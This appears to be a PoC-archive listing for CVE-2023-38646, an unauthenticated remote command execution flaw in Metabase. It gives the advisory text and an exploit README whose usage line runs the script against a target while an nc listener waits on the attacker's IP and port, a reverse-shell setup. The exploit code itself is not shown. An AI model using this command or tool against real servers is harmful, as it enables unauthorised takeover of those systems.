Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%

CVE-2023-38646 PoC — Metabase 安全漏洞

Source
Associated Vulnerability
Title:Metabase 安全漏洞 (CVE-2023-38646)
Description:Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
Description
Proof-of-Concept script for exploiting CVE-2023-38646. Intended for educational and research purposes only.
Readme
# CVE-2023-38646-PoC-Metabase
Proof-of-Concept script for exploiting CVE-2023-38646. Intended for educational and research purposes only.

## Description
This is a Python-based Proof-of-Concept (PoC) script to exploit CVE-2023-38646, a vulnerability affecting Metabase. The exploit abuses misconfigurations to achieve remote command execution. 

⚠️ **Disclaimer**:  
This script is intended solely for educational purposes and ethical research. Misuse of this script to attack systems without prior consent is illegal and unethical. The author is not responsible for any damage caused by the use of this tool.

## Features
- Retrieves session tokens automatically
- Generates payloads for remote command execution
- Automates exploit deployment

## Requirements
- Python 3.7+
- `requests` library (`pip install requests`)

## Usage
- Make sure to listen on port with nc first.
```bash
python3 exploit.py -u <target_url> -ip <your_ip> -p <your_port>
File Snapshot

[4.0K] /data/pocs/55fbaf56706205544750911cd5beca0ef83f885b ├── [1.0K] LICENSE ├── [3.1K] metabase_exploit.py └── [ 953] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →